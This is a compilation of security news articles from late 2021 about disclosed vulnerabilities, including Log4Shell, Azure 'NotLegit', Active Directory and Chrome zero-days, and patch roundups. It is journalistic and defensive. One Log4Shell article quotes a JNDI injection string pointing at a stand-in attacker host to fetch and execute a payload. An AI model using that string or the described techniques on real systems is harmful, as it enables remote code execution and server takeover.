Vulnerebility 2024 2023 2022 2021 2020
4-Year-Old Bug in Azure App Service Exposed Hundreds of Source Code Repositories
27.12.2021
Vulnerebility Thehackernews
A security flaw has been unearthed in Microsoft's Azure App Service that
resulted in the exposure of source code of customer applications written in
Java, Node, PHP, Python, and Ruby for at least four years since September 2017.
The vulnerability, codenamed "NotLegit," was reported to the tech giant by Wiz researchers on October 7, 2021, following which mitigations have been undertaken to fix the information disclosure bug in November. Microsoft said a "limited subset of customers" are at risk, adding "Customers who deployed code to App Service Linux via Local Git after files were already created in the application were the only impacted customers."
The Azure App Service (aka Azure Web Apps) is a cloud computing-based platform for building and hosting web applications. It allows users to deploy source code and artifacts to the service using a local Git repository, or via repositories hosted on GitHub and Bitbucket.
The insecure default behavior occurs when the Local Git method is used to deploy
to Azure App Service, resulting in a scenario where the Git repository is
created within a publicly accessible directory (home/site/wwwroot).
While Microsoft does add a "web.config" file to the .git folder — which contains the state and history of the repository — to restrict public access, the configuration files are only used with C# or ASP.NET applications that rely on Microsoft's own IIS web servers, leaving out apps coded in other programming languages like PHP, Ruby, Python, or Node that are deployed with different web servers like Apache, Nginx, and Flask.
"Basically, all a malicious actor had to do was to fetch the '/.git' directory from the target application, and retrieve its source code," Wiz researcher Shir Tamari said. "Malicious actors are continuously scanning the internet for exposed Git folders from which they can collect secrets and intellectual property. Besides the possibility that the source contains secrets like passwords and access tokens, leaked source code is often used for further sophisticated attacks."
"Finding vulnerabilities in software is much easier when the source code is available," Tamari added.
Researchers Disclose Unpatched Vulnerabilities in Microsoft Teams Software
27.12.2021
Vulnerebility Thehackernews
Microsoft said it
won't be fixing or is pushing patches to a later date for three of the four
security flaws uncovered in its Teams business communication platform earlier
this March.
The disclosure comes from Berlin-based cybersecurity firm Positive Security, which found that the implementation of the link preview feature was susceptible to a number of issues that could "allow accessing internal Microsoft services, spoofing the link preview, and, for Android users, leaking their IP address, and DoS'ing their Teams app/channels."
Of the four vulnerabilities, Microsoft is said to have addressed only one that results in IP address leakage from Android devices, with the tech giant noting that a fix for the denial-of-service (DoS) flaw will be considered in a future version of the product. The issues were responsibly disclosed to the company on March 10, 2021.
Chief among the flaws is a server-side request forgery (SSRF) vulnerability in
the endpoint "/urlp/v1/url/info" that could be exploited to glean information
from Microsoft's local network. Also discovered is a spoofing bug wherein the
preview link target can be altered to point to any malicious URL while keeping
the main link, preview image and description intact, allowing attackers to hide
malicious links and stage improved phishing attacks.
The DoS vulnerability, which affects the Android version of Teams, could cause the app to crash simply by sending a message with a specially crafted link preview containing an invalid target instead of a legitimate URL. The last of the issues concerns an IP address leak, which also affects the Android app. By intercepting messages that include a link preview to point the thumbnail URL to a non-Microsoft domain, Positive Security said it's possible to gain access to a user's IP address and user agent data.
"While the discovered vulnerabilities have a limited impact, it's surprising both that such simple attack vectors have seemingly not been tested for before, and that Microsoft does not have the willingness or resources to protect their users from them," Positive Security's co-founder Fabian Bräunlein said.
Active Directory Bugs Could Let hackers Take Over Windows Domain Controllers
27.12.2021
Vulnerebility Thehackernews
Microsoft is urging
customers to patch two security vulnerabilities in Active Directory domain
controllers that it addressed in November following the availability of a
proof-of-concept (PoC) tool on December 12.
The two vulnerabilities — tracked as CVE-2021-42278 and CVE-2021-42287 — have a severity rating of 7.5 out of a maximum of 10 and concern a privilege escalation flaw affecting the Active Directory Domain Services (AD DS) component. Credited with discovering and reporting both the bugs is Andrew Bartlett of Catalyst IT.
Active Directory is a directory service that runs on Microsoft Windows Server
and is used for identity and access management. Although the tech giant marked
the shortcomings as "exploitation Less Likely" in its assessment, the public
disclosure of the PoC has prompted renewed calls for applying the fixes to
mitigate any potential exploitation by threat actors.
While CVE-2021-42278 enables an attacker to tamper with the SAM-Account-Name attribute, which is used to log a user into systems in the Active Directory domain, CVE-2021-42287 makes it possible to impersonate the domain controllers. This effectively grants a bad actor with domain user credentials to gain access as a domain admin user.
"When combining these two vulnerabilities, an attacker can create a straightforward path to a Domain Admin user in an Active Directory environment that hasn't applied these new updates," Microsoft's senior product manager Daniel Naim said. "This escalation attack allows attackers to easily elevate their privilege to that of a Domain Admin once they compromise a regular user in the domain."
The Redmond-based company has also provided a step-by-step guide to help users ascertain if the vulnerabilities might have been exploited in their environments. "As always, we strongly advise deploying the latest patches on the domain controllers as soon as possible," Microsoft said.
New Mobile Network Vulnerabilities Affect All Cellular Generations Since 2G
27.12.2021
Vulnerebility Thehackernews
Researchers have disclosed security vulnerabilities in handover, a fundamental mechanism that undergirds modern cellular networks, which could be exploited by adversaries to launch denial-of-service (DoS) and man-in-the-middle (MitM) attacks using low-cost equipment.
The "vulnerabilities in the handover procedure are not limited to one handover case only but they impact all different handover cases and scenarios that are based on unverified measurement reports and signal strength thresholds," researchers Evangelos Bitsikas and Christina Pöpper from the New York University Abu Dhabi said in a new paper. "The problem affects all generations since 2G (GSM), remaining unsolved so far."
Handover, also known as handoff, is a process in telecommunications in which a phone call or a data session is transferred from one cell site (aka base station) to another cell tower without losing connectivity during the transmission. This method is crucial to establishing cellular communications, especially in scenarios when the user is on the move.
The routine typically works as follows: the user equipment (UE) sends signal strength measurements to the network to determine if a handover is necessary and, if so, facilitates the switch when a more suitable target station is discovered.
While these signal readings are cryptographically protected, the content of these reports is not verified by the network, thus allowing an attacker to force the device to move to a cell site operated by the attacker. The crux of the attack lies in the fact that the source base station is incapable of handling incorrect values in the measurement report, raising the possibility of a malicious handover without being detected.
The new fake base station attacks, in a nutshell, render vulnerable the handover procedures, which are based on the aforementioned encrypted measurement reports and signal power thresholds, effectively enabling the adversary to establish a MitM relay and even eavesdrop, drop, modify, and forward messages transmitted between the device and the network.
"If an attacker manipulates the content of the [measurement report] by including his/her measurements, then the network will process the bogus measurements," the researchers said. "This is possible by imitating a legitimate base station and replaying its broadcast messages."
"Attracting" the device to a fake base station
The starting point of the
attack is an initial reconnaissance phase wherein the threat actor utilizes a
smartphone to collect data pertaining to nearby legitimate stations and then
uses this information to configure a rogue base station that impersonates a
genuine cell station.
The attack subsequently involves forcing a victim's device to connect to the false station by broadcasting master information block (MIB) and system information block (SIB) messages — information necessary to help the phone connect to the network — with a higher signal strength than the emulated base station.
In tricking the UEs to connect to the imposter station and forcing the devices to report bogus measurements to the network, the goal is to trigger a handover event and exploit security flaws in the process to result in DoS, MitM attacks, and information disclosure affecting the user as well as the operator. This not only compromises users' privacy but also puts service availability at risk.
"When the UE is in the coverage area of the attacker, the rogue base station has high enough signal power to 'attract' the UE and trigger a [measurement report], then the attacker has very good chances of forcing the victim UE to attach to his/her rogue base station [by] abusing the handover procedure," the researchers explained.
"Once, the UE is attached to the attacker it could either enter in a camped mode due to a denial-of-service (DoS) attack and become unresponsive, or the attacker could establish a man-in-the-middle (MitM) relay building the basis for other advanced exploits."
As many as six security vulnerabilities (identified from A to F in the image above) have been identified in the handover process —
Insecure broadcast messages (MIB, SIB)
Unverified measurement reports
Missing cross-validation in the preparation phase
Random-access channel
(RACH) initiation without verification
Missing recovery mechanism, and
Difficulty of distinguishing network failures from attacks
In an experimental
setup, the researchers found all the test devices, including OnePlus 6, Apple
iPhone 5, Samsung S10 5G, and Huawei Pro P40 5G, to be susceptible to DoS and
MitM attacks. The findings were presented at the Annual Computer Security
Applications Conference (ACSAC) held earlier this month.
Apache Issues 3rd Patch to Fix New High-Severity Log4j Vulnerability
20.12.2021
Vulnerebility Thehackernews
The issues with
Log4j continued to stack up as the Apache Software Foundation (ASF) on Friday
rolled out yet another patch — version 2.17.0 — for the widely used logging
library that could be exploited by malicious actors to stage a denial-of-service
(DoS) attack.
Tracked as CVE-2021-45105 (CVSS score: 7.5), the new vulnerability affects all versions of the tool from 2.0-beta9 to 2.16.0, which the open-source nonprofit shipped earlier this week to remediate a second flaw that could result in remote code execution (CVE-2021-45046), which, in turn, stemmed from an "incomplete" fix for CVE-2021-44228, otherwise called the Log4Shell vulnerability.
"Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect from uncontrolled recursion from self-referential lookups," the ASF explained in a revised advisory. "When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a StackOverflowError that will terminate the process."
Hideki Okamoto of Akamai Technologies and an anonymous vulnerability researcher have been credited with reporting the flaw. Log4j versions 1.x, however, are not affected by CVE-2021-45105.
It's worth pointing out that the severity score of CVE-2021-45046, originally classified as a DoS bug, has since been revised from 3.7 to 9.0, to reflect the fact that an attacker could abuse the vulnerability to send a specially crafted string that leads to "information leak and remote code execution in some environments and local code execution in all environments," corroborating a previous report from security researchers at Praetorian.
The project maintainers also noted that Log4j versions 1.x have reached end of life and are no longer supported, and that security flaws uncovered in the utility after August 2015 will not be fixed, urging users to upgrade to Log4j 2 to get the latest fixes.
The fixes are the latest in what's a highly dynamic situation as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an emergency directive mandating federal civilian departments and agencies to immediately patch their internet-facing systems for the Apache Log4j vulnerabilities by December 23, 2021, citing that the weaknesses pose an "unacceptable risk."
The development also comes as the Log4j flaws have emerged as a lucrative attack vector and a focal point for exploitation by multiple threat actors, including nation-backed hackers from the likes of China, Iran, North Korea, and Turkey as well as the Conti ransomware gang, to carry out an array of follow-on malicious activities. This marks the first time the vulnerability has come under the radar of a sophisticated crimeware cartel.
"The current exploitation led to multiple use cases through which the Conti group tested the possibilities of utilizing the Log4j 2 exploit," AdvIntel researchers said. "the criminals pursued targeting specific vulnerable Log4j 2 VMware vCenter [servers] for lateral movement directly from the compromised network resulting in vCenter access affecting U.S. and European victim networks from the pre-existent Cobalt Strike sessions."
Among the others to leverage the bug are cryptocurrency miners, botnets, remote access trojans, initial access brokers, and a new ransomware strain called Khonsari. Israeli security firm Check Point said it recorded over 3.7 million exploitation attempts to date, with 46% of those intrusions made by known malicious groups.
Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released
17.12.2021
Vulnerebility Thehackernews
The Apache Software
Foundation (ASF) has pushed out a new fix for the Log4j logging utility after
the previous patch for the recently disclosed Log4Shell exploit was deemed as
"incomplete in certain non-default configurations."
The second vulnerability — tracked as CVE-2021-45046 — is rated 3.7 out of a maximum of 10 on the CVSS rating system and affects all versions of Log4j from 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0, which the project maintainers shipped last week to address a critical remote code execution vulnerability (CVE-2021-44228) that could be abused to infiltrate and take over systems.
The incomplete patch for CVE-2021-44228 could be abused to "craft malicious input data using a JNDI Lookup pattern resulting in a denial-of-service (DoS) attack," the ASF said in a new advisory. The latest version of Log4j, 2.16.0 (for users requiring Java 8 or later), all but removes support for message lookups and disables JNDI by default, the component that's at the heart of the vulnerability. Users requiring Java 7 are recommended to upgrade to Log4j release 2.12.2 when it becomes available.
"Dealing with CVE-2021-44228 has shown the JNDI has significant security issues," Ralph Goers of the ASF explained. "While we have mitigated what we are aware of it would be safer for users to completely disable it by default, especially since the large majority are unlikely to be using it."
JNDI, short for Java Naming and Directory Interface, is a Java API that enables applications coded in the programming language to look up data and resources such as LDAP servers. Log4Shell is resident in the Log4j library, an open-source, Java-based logging framework commonly incorporated into Apache web servers.
The issue itself occurs when the JNDI component of the LDAP connector is leveraged to inject a malicious LDAP request — something like "${jndi:ldap://attacker_controled_website/payload_to_be_executed}" — that, when logged on a web server running the vulnerable version of the library, enables an adversary to retrieve a payload from a remote domain and execute it locally.
The latest update arrives as fallout from the flaw has resulted in a "true cyber pandemic," what with several threat actors seizing on Log4Shell in ways that lay the groundwork for further attacks, including deploying coin miners, remote access trojans, and ransomware on susceptible machines. The opportunistic intrusions are said to have commenced at least since December 1, although the bug became common knowledge on December 9.
The security flaw has sparked widespread alarm because it exists in a near-ubiquitously used logging framework in Java applications, presenting bad actors with an unprecedented gateway to penetrate and compromise millions of devices across the world.
Spelling further trouble for organizations, the remotely exploitable flaw also impacts hundreds of major enterprise products from a number of companies such as Akamai, Amazon, Apache, Apereo, Atlassian, Broadcom, Cisco, Cloudera, ConnectWise, Debian, Docker, Fortinet, Google, IBM, Intel, Juniper Networks, Microsoft, Okta, Oracle, Red Hat, SolarWinds, SonicWall, Splunk, Ubuntu, VMware, Zscaler, and Zoho, posing a significant software supply chain risk.
"Unlike other major cyberattacks that involve one or a limited number of software, Log4j is basically embedded in every Java based product or web service. It is very difficult to manually remediate it," Israeli security company Check Point said. "This vulnerability, because of the complexity in patching it and easiness to exploit, seems that it will stay with us for years to come, unless companies and services take immediate action to prevent the attacks on their products by implementing a protection."
In the days after the bug was disclosed, at least ten different groups have jumped in on the exploit bandwagon and roughly 44% of corporate networks globally already have been under attack, marking a significant escalation of sorts. Furthermore, criminal gangs acting as access brokers have begun using the vulnerability to gain initial foothold into target networks and then sell the access to ransomware-as-a-service (RaaS) affiliates.
This also encompasses nation-state actors originating from China, Iran, North Korea, and Turkey, with Microsoft noting that the "activity ranges from experimentation during development, integration of the vulnerability to in-the-wild payload deployment, and exploitation against targets to achieve the actor's objectives."
The large-scale weaponization of the remote code execution flaw has prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to add Log4Shell to its Known Exploited Vulnerabilities Catalog, giving federal agencies a deadline of December 24 to incorporate patches for the vulnerability and urging vendors to "immediately identify, mitigate, and patch affected products using Log4j."
Sean Gallagher, a senior threat researcher at Sophos, warned that "adversaries are likely grabbing as much access to whatever they can get right now with the view to monetize and/or capitalize on it later on," adding "there is a lull before the storm in terms of more nefarious activity from the Log4Shell vulnerability."
"The most immediate priority for defenders is to reduce exposure by patching and mitigating all corners of their infrastructure and investigate exposed and potentially compromised systems. This vulnerability can be everywhere," Gallagher added.
Latest Apple iOS Update Patches Remote Jailbreak Exploit for iPhones
17.12.2021
Vulnerebility Thehackernews
Apple on Monday
released updates to iOS, macOS, tvOS, and watchOS with security patches for
multiple vulnerabilities, including a remote jailbreak exploit chain as well as
a number of critical issues in the Kernel and Safari web browser that were first
demonstrated at the Tianfu Cup held in China two months ago.
Tracked as CVE-2021-30955, the issue could have enabled a malicious application to execute arbitrary code with kernel privileges. Apple said it addressed the race condition bug with "improved state handling." The flaw also impacts macOS devices.
"The kernel bug CVE-2021-30955 is the one we tried [to] use to build our remote jailbreak chain but failed to complete on time," Kunlun Lab's chief executive, @mj0011sec, said in a tweet. A set of similar kernel vulnerabilities were eventually harnessed by the Pangu Team at the Tianfu hacking contest to break into an iPhone13 Pro running iOS 15, a feat that netted the white hat hackers $330,000 in cash rewards.
Besides CVE-2021-30955, a total of five Kernel and four IOMobileFrameBuffer (a kernel extension for managing the screen framebuffer) flaws have been remediated with the latest updates —
CVE-2021-30927 and CVE-2021-30980: A use after free issue that could allow a
rogue application to run arbitrary code with kernel privileges.
CVE-2021-30937: A memory corruption vulnerability that could allow a rogue
application to run arbitrary code with kernel privileges.
CVE-2021-30949: A
memory corruption issue that could allow a rogue application to run arbitrary
code with kernel privileges.
CVE-2021-30993: A buffer overflow issue that
could allow an attacker in a privileged network position may be able to execute
arbitrary code
CVE-2021-30983: A buffer overflow issue that could allow an
application to run arbitrary code with kernel privileges.
CVE-2021-30985: An
out-of-bounds write issue that could allow a rogue application to run arbitrary
code with kernel privileges.
CVE-2021-30991: An out-of-bounds read issue that
could allow a malicious application to run arbitrary code with kernel
privileges.
CVE-2021-30996: A race condition that could allow a rogue
application to run arbitrary code with kernel privileges.
On the macOS front,
the Cupertino-based company patched an issue with the Wi-Fi module
(CVE-2021-30938) that a local user on the system could exploit to cause
unexpected system termination and even read kernel memory. The tech giant
credited Xinru Chi of Pangu Lab with reporting the flaw.
Also fixed are seven security flaws in the WebKit component — CVE-2021-30934, CVE-2021-30936, CVE-2021-30951, CVE-2021-30952, CVE-2021-30953, CVE-2021-30954, and CVE-2021-30984t — that could potentially result in a scenario where processing specially crafted web content may lead to arbitrary code execution.
Additionally, Apple also resolved a couple of issues affecting Notes and Password Manager apps in iOS that could enable a person with physical access to an iOS device to access contacts from the lock screen and retrieve stored passwords without any authentication. Last but not least, a bug in FaceTime has been squashed, which otherwise may have leaked sensitive user information through Live Photos metadata.
Update Google Chrome to Patch New Zero-Day Exploit Detected in the Wild
17.12.2021
Vulnerebility Thehackernews
Google has rolled
out fixes for five security vulnerabilities in its Chrome web browser, including
one which it says is being exploited in the wild, making it the 17th such
weakness to be disclosed since the start of the year.
Tracked as CVE-2021-4102, the flaw relates to a use-after-free bug in the V8 JavaScript and WebAssembly engine, which could have severe consequences ranging from corruption of valid data to the execution of arbitrary code. An anonymous researcher has been credited with discovering and reporting the flaw.
As it stands, it's not known how the weakness is being abused in real-world attacks, but the internet giant issued a terse statement that said, "it's aware of reports that an exploit for CVE-2021-4102 exists in the wild." This is done so in an attempt to ensure that a majority of users are updated with a fix and prevent further exploitation by other threat actors.
CVE-2021-4102 is the second use-after-free vulnerability in V8 the company has remediated in less than three months following reports of active exploitation, with the previous vulnerability CVE-2021-37975, also reported by an anonymous researcher, plugged in an update it shipped on September 30. It's not immediately clear if the two flaws bear any relation to one another.
With this latest update, Google has addressed a record 17 zero-days in Chrome this year alone —
CVE-2021-21148 - Heap buffer overflow in V8
CVE-2021-21166 - Object recycle
issue in audio
CVE-2021-21193 - Use-after-free in Blink
CVE-2021-21206 -
Use-after-free in Blink
CVE-2021-21220 - Insufficient validation of untrusted
input in V8 for x86_64
CVE-2021-21224 - Type confusion in V8
CVE-2021-30551 - Type confusion in V8
CVE-2021-30554 - Use-after-free in
WebGL
CVE-2021-30563 - Type confusion in V8
CVE-2021-30632 - Out of bounds
write in V8
CVE-2021-30633 - Use-after-free in Indexed DB API
CVE-2021-37973 - Use-after-free in Portals
CVE-2021-37975 - Use-after-free in
V8
CVE-2021-37976 - Information leak in core
CVE-2021-38000 - Insufficient
validation of untrusted input in Intents
CVE-2021-38003 - Inappropriate
implementation in V8
Chrome users are recommended to update to the latest
version (96.0.4664.110) for Windows, Mac, and Linux by heading to Settings >
Help > 'About Google Chrome' to mitigate any potential risk of active
exploitation.
Apache Log4j Vulnerability — Log4Shell — Widely Under Active Attack
17.12.2021
Vulnerebility Thehackernews
Threat actors
are actively weaponizing unpatched servers affected by the newly identified
"Log4Shell" vulnerability in Log4j to install cryptocurrency miners, Cobalt
Strike, and recruit the devices into a botnet, even as telemetry signs point to
exploitation of the flaw nine days before it even came to light.
Netlab, the networking security division of Chinese tech giant Qihoo 360, disclosed threats such as Mirai and Muhstik (aka Tsunami) are setting their sights on vulnerable systems to spread the infection and grow its computing power to orchestrate distributed denial-of-service (DDoS) attacks with the goal of overwhelming a target and rendering it unusable. Muhstik was previously spotted exploiting a critical security flaw in Atlassian Confluence (CVE-2021-26084, CVSS score: 9.8) earlier this September.
The latest development comes as it has emerged that the vulnerability has been under attack for at least more than a week prior to its public disclosure on December 10, and companies like Auvik, ConnectWise Manage, and N-able have confirmed their services are impacted, widening the scope of the flaw's reach to more manufacturers.
"Earliest evidence we've found so far of [the] Log4j exploit is 2021-12-01 04:36:50 UTC," Cloudflare CEO Matthew Prince tweeted Sunday. "That suggests it was in the wild at least nine days before publicly disclosed. However, don't see evidence of mass exploitation until after public disclosure." Cisco Talos, in an independent report, said it observed attacker activity related to the flaw beginning December 2.
Tracked CVE-2021-44228 (CVSS score: 10.0), the flaw concerns a case of remote
code execution in Log4j, a Java-based open-source Apache logging framework
broadly used in enterprise environments to record events and messages generated
by software applications.
All that is required of an adversary to leverage the vulnerability is send a specially crafted string containing the malicious code that gets logged by Log4j version 2.0 or higher, effectively enabling the threat actor to load arbitrary code from an attacker-controlled domain on a susceptible server and take over control.
"The bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers," Microsoft 365 Defender Threat Intelligence Team said in an analysis. "Based on the nature of the vulnerability, once the attacker has full access and control of an application, they can perform a myriad of objectives."
In particular, the Redmond-based tech giant said it detected a wealth of malicious activities, including installing Cobalt Strike to enable credential theft and lateral movement, deploying coin miners, and exfiltrating data from the compromised machines.
The situation has also left companies scrambling to roll out fixes for the bug. Network security vendor SonicWall, in an advisory, revealed its Email Security solution is affected, stating it's working to release a fix for the issue while it continues to investigate the rest of its lineup. Virtualization technology provider VMware, likewise, warned of "exploitation attempts in the wild," adding that it's pushing out patches to a number of its products.
If anything, incidents like these illustrate how a single flaw, when uncovered in packages incorporated in a lot of software, can have ripple effects, acting as a channel for further attacks and posing a critical risk to affected systems. "All threat actors need to trigger an attack is one line of text," Huntress Labs Senior Security Researcher John Hammond said. "There's no obvious target for this vulnerability — hackers are taking a spray-and-pray approach to wreak havoc."
Extremely Critical Log4J Vulnerability Leaves Much of the Internet at Risk
12.12.2021
Vulnerebility Thehackernews
The Apache
Software Foundation has released fixes to contain an actively exploited zero-day
vulnerability affecting the widely-used Apache Log4j Java-based logging library
that could be weaponized to execute malicious code and allow a complete takeover
of vulnerable systems.
Tracked as CVE-2021-44228 and by the monikers Log4Shell or LogJam, the issue concerns a case of unauthenticated, remote code execution (RCE) on any application that uses the open-source utility and affects versions Log4j 2.0-beta9 up to 2.14.1. The bug has scored a perfect 10 on 10 in the CVSS rating system, indicative of the severity of the issue.
"An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled," the Apache Foundation said in an advisory. "From Log4j 2.15.0, this behavior has been disabled by default."
Exploitation can be achieved by a single string of text, which can trigger an application to reach out to a malicious external host if it is logged via the vulnerable instance of Log4j, effectively granting the adversary the ability to retrieve a payload from a remote server and execute it locally. The project maintainers credited Chen Zhaojun of Alibaba Cloud Security Team with discovering the issue.
Log4j is used as a logging package in a variety of different popular software by a number of manufacturers, including Amazon, Apple iCloud, Cisco, Cloudflare, ElasticSearch, Red Hat, Steam, Tesla, Twitter, and video games such as Minecraft. In the case of the latter, attackers have been able to gain RCE on Minecraft Servers by simply pasting a specially crafted message into the chat box.
A huge attack surface
"The Apache Log4j zero-day vulnerability is probably
the most critical vulnerability we have seen this year," said Bharat Jogi,
senior manager of vulnerabilities and signatures at Qualys. "Log4j is a
ubiquitous library used by millions of Java applications for logging error
messages. This vulnerability is trivial to exploit."
Cybersecurity firms BitDefender, Cisco Talos, Huntress Labs, and Sonatype have all confirmed evidence of mass scanning of affected applications in the wild for vulnerable servers and attacks registered against their honeypot networks following the availability of a proof-of-concept (PoC) exploit. "This is a low skilled attack that is extremely simple to execute," Sonatype's Ilkka Turunen said.
GreyNoise, likening the flaw to Shellshock, said it observed malicious activity targeting the vulnerability commencing on December 9, 2021. Web infrastructure company Cloudflare noted that it blocked roughly 20,000 exploit requests per minute around 6:00 p.m. UTC on Friday, with most of the exploitation attempts originating from Canada, the U.S., Netherlands, France, and the U.K.
Given the ease of exploitation and prevalence of Log4j in enterprise IT and
DevOps, in-the-wild attacks aimed at susceptible servers are expected to ramp up
in the coming days, making it imperative to address the flaw immediately.
Israeli cybersecurity firm Cybereason has also released a fix called
"Logout4Shell" that closes out the shortcoming by using the vulnerability itself
to reconfigure the logger and prevent further exploitation of the attack.
"This Log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string," Security expert Marcus Hutchins said in a tweet.
Critical Remote Hacking Flaws Disclosed in Linphone and MicroSIP Softphones
15.10.21 Vulnerebility
Thehackernews
Multiple security
vulnerabilities have been disclosed in softphone software from Linphone and
MicroSIP that could be exploited by an unauthenticated remote adversary to crash
the client and even extract sensitive information like password hashes by simply
making a malicious call.
The vulnerabilities, which were discovered by Moritz Abrell of German pen-testing firm SySS GmbH, have since been addressed by the respective manufacturers following responsible disclosure.
Softphones are essentially software-based phones that mimic desk phones and allow for making telephone calls over the Internet without the need for using dedicated hardware. At the core of the issues are the SIP services offered by the clients to connect two peers to facilitate telephony services in IP-based mobile networks.
SIP aka Session Initiation Protocol is a signaling protocol that's used to control interactive communication sessions, such as voice, video, chat and instant messaging, as well as games and virtual reality, between endpoints, in addition to defining rules that govern the establishment and termination of each session.
A typical session in SIP commences with a user agent (aka endpoint) sending an INVITE message to a peer through SIP proxies — which are used to route requests — that, when accepted on the other end by the recipient, results in the call initiator being notified, followed by the actual data flow. SIP invitations carry session parameters that allow participants to agree on a set of compatible media types.
The attack devised by SySS is what's called a SIP Digest Leak, which involves
sending a SIP INVITE message to the target softphone to negotiate a session
followed by sending a "407 proxy authentication required" HTTP response status
code, indicating the inability to complete the request because of a lack of
valid authentication credentials, prompting the softphone to respond back with
the necessary authentication data.
"With this information, the attacker is able to perform an offline password
guessing attack, and, if the guessing attack is successful, obtain the plaintext
password of the targeted SIP account," Abrell explained. "Therefore, this
vulnerability in combination with weak passwords is a significant security
issue."
Also discovered is a NULL pointer dereference vulnerability in the Linphone SIP stack that could be triggered by an unauthenticated remote attacker by sending a specially crafted SIP INVITE request that could crash the softphone. "A missing tag parameter in the From header causes a crash of the SIP stack of Linphone," Abrell said.
The disclosure is the second time a NULL pointer dereference vulnerability has been discovered in the Linphone SIP client. In September 2021, Claroty made public details of a zero-click flaw in the protocol stack (CVE-2021-33056) that could be remotely exploited without any action from a victim to crash the SIP client and cause a denial-of-service (DoS) condition.
"The security level of SIP stacks still needs improvement," Abrell said, calling the need for a defense-in-depth approach that entails "defining and implementing appropriate security measures for the secure operation of unified communication systems."
Update Your Windows PCs Immediately to Patch New 0-Day Under Active Attack
13.10.21
Vulnerebility
Thehackernews
Microsoft on Tuesday
rolled out security patches to contain a total of 71 vulnerabilities in
Microsoft Windows and other software, including a fix for an actively exploited
privilege escalation vulnerability that could be exploited in conjunction with
remote code execution bugs to take control over vulnerable systems.
Two of the addressed security flaws are rated Critical, 68 are rated Important, and one is rated Low in severity, with three of the issues listed as publicly known at the time of the release. The four zero-days are as follows —
CVE-2021-40449 (CVSS score: 7.8) - Win32k Elevation of Privilege Vulnerability
CVE-2021-41335 (CVSS score: 7.8) - Windows Kernel Elevation of Privilege
Vulnerability
CVE-2021-40469 (CVSS score: 7.2) - Windows DNS Server Remote
Code Execution Vulnerability
CVE-2021-41338 (CVSS score: 5.5) - Windows
AppContainer Firewall Rules Security Feature Bypass Vulnerability
At the top
of the list is CVE-2021-40449, a use-after-free vulnerability in the Win32k
kernel driver discovered by Kaspersky as being exploited in the wild in late
August and early September 2021 as part of a widespread espionage campaign
targeting IT companies, defense contractors, and diplomatic entities. The
Russian cybersecurity firm dubbed the threat cluster "MysterySnail."
"Code similarity and re-use of C2 [command-and-control] infrastructure we discovered allowed us to connect these attacks with the actor known as IronHusky and Chinese-speaking APT activity dating back to 2012," Kaspersky researchers Boris Larin and Costin Raiu said in a technical write-up, with the infection chains leading to the deployment of a remote access trojan capable of collecting and exfiltrating system information from compromised hosts before reaching out to its C2 server for further instructions.
Other bugs of note include remote code execution vulnerabilities affecting Microsoft Exchange Server (CVE-2021-26427), Windows Hyper-V (CVE-2021-38672 and CVE-2021-40461), SharePoint Server (CVE-2021-40487 and CVE-2021-41344), and Microsoft Word (CVE-2021-40486) as well as an information disclosure flaw in Rich Text Edit Control (CVE-2021-40454).
CVE-2021-26427, which has a CVSS score of 9.0 and was identified by the U.S. National Security Agency, underscores that "Exchange servers are high-value targets for hackers looking to penetrate business networks," Bharat Jogi, senior manager of vulnerability and threat research at Qualys, said.
The October Patch Tuesday is rounded out by fixes for two shortcomings newly discovered in the Print Spooler component — CVE-2021-41332 and CVE-2021-36970 — each concerning an information disclosure bug and a spoofing vulnerability, which has been tagged with an "Exploitation More Likely" exploitability index assessment.
"A spoofing vulnerability usually indicates that an attacker can impersonate or identify as another user," security researcher ollypwn noted in a Twitter thread. "In this case, it looks like an attacker can abuse the Spooler service to upload arbitrary files to other servers."
Digital Signature Spoofing Flaws Uncovered in OpenOffice and LibreOffice
13.10.21
Vulnerebility
Thehackernews
The maintainers of
LibreOffice and OpenOffice have shipped security updates to their productivity
software to remediate multiple vulnerabilities that could be weaponized by
malicious actors to alter documents to make them appear as if they are digitally
signed by a trusted source.
The list of the three flaws is as follows —
CVE-2021-41830 / CVE-2021-25633 - Content and Macro Manipulation with Double
Certificate Attack
CVE-2021-41831 / CVE-2021-25634 - Timestamp Manipulation
with Signature Wrapping
CVE-2021-41832 / CVE-2021-25635 - Content
Manipulation with Certificate Validation Attack
Successful exploitation of
the vulnerabilities could permit an attacker to manipulate the timestamp of
signed ODF documents, and worse, alter the contents of a document or self-sign a
document with an untrusted signature, which is then tweaked to change the
signature algorithm to an invalid or unknown algorithm.
In both the latter two attack scenarios — stemming as a result of improper certificate validation — LibreOffice incorrectly displays a validly signed indicator suggesting that the document hasn't been tampered with since signing and presents a signature with an unknown algorithm as a legitimate signature issued by a trusted party.
The weaknesses have been fixed in OpenOffice version 4.1.11 and LibreOffice versions 7.0.5, 7.0.6, 7.1.1 as well as 7.1.2. The Chair for Network and Data Security (NDS) at the Ruhr-University Bochum has been credited with discovering and reporting all three issues.
The findings are the latest in a series of flaws uncovered by the Ruhr-University Bochum researchers and follow similar attack techniques disclosed earlier this year that could potentially enable an adversary to modify a certified PDF document's visible content by displaying malicious content over the certified content without invalidating its signature.
Users of LibreOffice and OpenOffice are advised to update to the latest version to mitigate the risk associated with the flaws.
GitHub Revoked Insecure SSH Keys Generated by a Popular git Client
13.10.21
Vulnerebility
Thehackernews
Code hosting platform
GitHub has revoked weak SSH authentication keys that were generated via the
GitKraken git GUI client due to a vulnerability in a third-party library that
increased the likelihood of duplicated SSH keys.
As an added precautionary measure, the Microsoft-owned company also said it's building safeguards to prevent vulnerable versions of GitKraken from adding newly generated weak keys.
The problematic dependency, called "keypair," is an open-source SSH key generation library that allows users to create RSA keys for authentication-related purposes. It has been found to impact GitKraken versions 7.6.x, 7.7.x, and 8.0.0, released between May 12, 2021, and September 27, 2021.
